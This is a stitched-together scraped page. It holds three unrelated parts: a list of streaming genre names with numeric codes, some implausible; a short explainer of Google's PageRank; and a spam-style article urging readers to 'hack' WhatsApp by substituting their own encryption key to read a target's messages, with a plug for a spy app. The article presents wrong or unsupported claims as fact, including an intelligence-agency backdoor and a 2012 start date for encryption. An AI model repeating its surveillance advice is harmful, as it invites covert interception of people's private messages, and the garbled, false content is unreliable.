  • Anime Series: 6721
  • Art House Movies: 29764
  • Asian Action Movies: 77232
  • Australian Movies: 5230
  • B-Horror Movies: 8195
  • Baseball Movies: 12339
  • Basketball Movies: 12762
  • Belgian Movies: 262
  • Biographical Documentaries: 3652
  • Biographical Dramas: 3179
  • Boxing Movies: 12443
  • British Movies: 10757
  • British TV Shows: 52117
  • Campy Movies: 1252
  • Children & Family Movies: 783
  • Chinese Movies: 3960
  • Classic Action & Adventure: 46576
  • Classic Comedies: 31694
  • Classic Dramas: 29809
  • Classic Foreign Movies: 32473
  • Classic Movies: 31574
  • Classic Musicals: 32392
  • Classic Romantic Movies: 31273
  • Classic Sci-Fi & Fantasy: 47147
  • Classic Thrillers: 46588
  • Classic TV Shows: 46553
  • Classic War Movies: 48744
  • Classic Westerns: 47465
  • Comedies: 6548
  • Comic Book and Superhero Movies: 10118
  • Country & Western/Folk: 1105
  • Courtroom Dramas: 528582748
  • Creature Features: 6895
  • Crime Action & Adventure: 9584
  • Crime Documentaries: 9875
  • Crime Dramas: 6889
  • Crime Thrillers: 10499
  • Crime TV Shows: 26146
  • Cult Comedies: 9434
  • Cult Horror Movies: 10944
  • Cult Movies: 7627
  • Cult Sci-Fi & Fantasy: 4734
  • Cult TV Shows: 74652
  • Dark Comedies: 869
  • Deep Sea Horror Movies: 45028
  • Disney: 67673
  • Disney Musicals: 59433
  • Documentaries: 6839
  • Dramas: 5763
  • Dramas based on Books: 4961
  • Dramas based on real life: 3653
  • Dutch Movies: 10606
  • Eastern European Movies: 5254
  • Education for Kids: 10659
  • Epics: 52858
  • Experimental Movies: 11079
  • Faith & Spirituality: 26835
  • Faith & Spirituality Movies: 52804
  • Family Features: 51056
  • Fantasy Movies: 9744
  • Film Noir: 7687
  • Food & Travel TV: 72436
  • Football Movies: 12803
  • Foreign Action & Adventure: 11828
  • Foreign Comedies: 4426
  • Foreign Documentaries: 5161
  • Foreign Dramas: 2150
  • Foreign Gay & Lesbian Movies: 8243
  • Foreign Horror Movies: 8654
  • Foreign Movies: 7462
  • Foreign Sci-Fi & Fantasy: 6485
  • Foreign Thrillers: 10306
  • French Movies: 58807
  • Gangster Movies: 31851
  • Gay & Lesbian Dramas: 500
  • German Movies: 58886
  • Greek Movies: 61115
  • Historical Documentaries: 5349
  • Horror Comedy: 89585
  • Horror Movies: 8711
  • Independent Action & Adventure: 11804
  • Independent Comedies: 4195
  • Independent Dramas: 384
  • Independent Movies: 7077
  • Independent Thrillers: 3269
  • Indian Movies: 10463
  • Irish Movies: 58750
  • Italian Movies: 8221
  • Japanese Movies: 10398
  • Jazz & Easy Listening: 10271
  • Kids Faith & Spirituality: 751423
  • Kids Music: 52843
  • Kids’ TV: 27346
  • Korean Movies: 5685
  • Korean TV Shows: 67879
  • Late Night Comedies: 1402
  • Latin American Movies: 1613
  • Latin Music: 10741
  • Martial Arts Movies: 8985
  • Martial Arts, Boxing & Wrestling: 6695
  • Middle Eastern Movies: 5875
  • Military Action & Adventure: 2125
  • Military Documentaries: 4006
  • Military Dramas: 11
  • Military TV Shows: 25804
  • Miniseries: 4814
  • Mockumentaries: 26
  • Monster Movies: 947
  • Movies based on children’s books: 10056
  • Movies for ages 0 to 2: 6796
  • Movies for ages 2 to 4: 6218
  • Movies for ages 5 to 7: 5455
  • Movies for ages 8 to 10: 561
  • Movies for ages 11 to 12: 6962
  • Music & Concert Documentaries: 90361
  • Music: 1701
  • Musicals: 13335
  • Mysteries: 9994
  • New Zealand Movies: 63782
  • Period Pieces: 12123
  • Political Comedies: 2700
  • Political Documentaries: 7018
  • Political Dramas: 6616
  • Political Thrillers: 10504
  • Psychological Thrillers: 5505
  • Quirky Romance: 36103
  • Reality TV: 9833
  • Religious Documentaries: 10005
  • Rock & Pop Concerts: 3278
  • Romantic Comedies: 5475
  • Romantic Dramas: 1255
  • Romantic Favorites: 502675
  • Romantic Foreign Movies: 7153
  • Romantic Independent Movies: 9916
  • Romantic Movies: 8883
  • Russian: 11567
  • Satanic Stories: 6998
  • Satires: 4922
  • Scandinavian Movies: 9292
  • Sci-Fi & Fantasy: 1492
  • Sci-Fi Adventure: 6926
  • Sci-Fi Dramas: 3916
  • Sci-Fi Horror Movies: 1694
  • Sci-Fi Thrillers: 11014
  • Science & Nature Documentaries: 2595
  • Science & Nature TV: 52780
  • Screwball Comedies: 9702
  • Showbiz Dramas: 5012
  • Showbiz Musicals: 13573
  • Silent Movies: 53310
  • Slapstick Comedies: 10256
  • Slasher and Serial Killer Movies: 8646
  • Soccer Movies: 12549
  • Social & Cultural Documentaries: 3675
  • Social Issue Dramas: 3947
  • Southeast Asian Movies: 9196
  • Spanish Movies: 58741
  • Spiritual Documentaries: 2760
  • Sports & Fitness: 9327
  • Sports Comedies: 5286
  • Sports Documentaries: 180
  • Sports Dramas: 7243
  • Sports Movies: 4370
  • Spy Action & Adventure: 10702
  • Spy Thrillers: 9147
  • Stage Musicals: 55774
  • Stand-up Comedy: 11559
  • Steamy Romantic Movies: 35800
  • Steamy Thrillers: 972
  • Supernatural Horror Movies: 42023
  • Supernatural Thrillers: 11140
  • Tearjerkers: 6384
  • Teen Comedies: 3519
  • Teen Dramas: 9299
  • Teen Screams: 52147
  • Teen TV Shows: 60951
  • Thrillers: 8933
  • Travel & Adventure Documentaries: 1159
  • TV Action & Adventure: 10673
  • TV Cartoons: 11177
  • TV Comedies: 10375
  • TV Documentaries: 10105
  • TV Dramas: 11714
  • TV Horror: 83059
  • TV Mysteries: 4366
  • TV Sci-Fi & Fantasy: 1372
  • TV Shows: 83
  • Urban & Dance Concerts: 9472
  • Vampire Horror Movies: 75804
  • Werewolf Horror Movies: 75930
  • Westerns: 7700
  • World Music Concerts: 2856
  • Zombie Horror Movies: 75405

Why Google Delivers More Targeted Results Than Other Search Engines

  • Like most of the major search engines, Google assembles the pages in its search index by using special “searchbot” or crawler software to scour the Web. Found pages are automatically added to Google’s ever-expanding database; when you perform a search, you’re actually searching this database of Web pages, not the Web itself.
  • The results of your Google searches are ranked according to Google’s trademarked PageRank technology. This technology measures how many other pages link to a particular page; the more links to a page, the higher that page ranks. In addition, PageRank assigns a higher weight to links that come from higher-ranked pages. So if a page is linked to from a number of high-ranked pages, that page will itself achieve a higher ranking.
  • The theory is that the more popular a page is, the higher that page’s ultimate value. While this sounds a little like a popularity contest (and it is), it’s surprising how often this approach delivers high-quality results.
  • The number of Web pages indexed by Google is among the largest of all search engines (Google and AllTheWeb are continually jockeying for “biggest” bragging rights), which means you stand a fairly good chance of actually finding what you were searching for. And the Google search engine is relatively smart; it analyzes the keywords in your query and recognizes the type of search result you’re looking for. (For example, if you enter a person’s name and city, it knows to search its phone book—not the general Web index.)

Hack whatsapp messages without access to phone

WhatsApp Tracker allows Hackers to Intercept and Read Your Encrypted Messages

This method is perhaps the most appealing of them all. In essence, it uses a “backdoor” flaw.

Some say it is a severe mistake, while others claim it is an additional feature.

Anyway, it allows to you to hack Whatsapp and to read, by intercepting the messages between users. Backdoor is used by Whatsapp, Telegram, and a few more apps.

First of all, we should explain the end-to-end encryption. It means that you, as a user will send an encrypted message to another person.

Only after it is received, it will be decrypted and readable. Whatsapp introduced this feature in 2012 and then became the most secure app of them all. Sadly, it looks like it isn’t so secure.

Whatsapp is owned by Facebook, and if we know that this giant allows to the central intelligence agencies to spy on their users, we can deduce that Whatsapp shares the same flaw.

That’s why the backdoor feature exists. Originally, it has been developed for central intelligence agencies, but at the same time, it is something that hackers can use.

Furthermore, Whatsapp end-to-end encryption works on “trust”. The company uses a secure server to process the messages, but according to the user agreement, they can change any of the rules at any given moment.

Basically, Whatsapp can choose to share your messages with others and you won’t know about it!

How this actually works?

The vulnerability relies on the way WhatsApp behaves when an end user’s encryption key changes.

Basically, we have a scenario between users A and a person B.

When a person A sends a few messages to the person B, the Whatsapp on that device will decrypt the messages and allow for the user to read them.

But, when a user B replaces the device, he will also be able to get and read those messages.

This is possible due to the fact Whatsapp choose to update and modify the private keys, needed for decryption at any given moment, without informing the user.

Now, you as a hacker will be user C. You will modify the private key of a user B and insert your own.

By doing so, you will directly be able to read messages of user A. Whatsapp spy app that can do it for you isn’t so complicated to use, after all.

Here we have another advantage of this method. Facebook, which owns Whatsapp didn’t solve this issue since 2016. It is obvious that it will stay available in the future as well.

All of this means that you, as a hacker will be able to exploit this method in the near future. Using Whatsapp tracker online and using this method will give impressive results.

Some believe that backdoor feature is used as a feature to eliminate the need for constant privacy key verification, which is annoying. Instead, Whatsapp will do it instead of you.

But, Signal private messenger, which uses the same technology is immune to this issue, simply due to the fact it requires physical verification.

If you are a decent hacker, you will be able to exploit this method or better said this drawback of the Whatsapp.

After all, it is introduced to allow for agencies to spy on users, which means that hackers, including yourself, can use it for the same reason.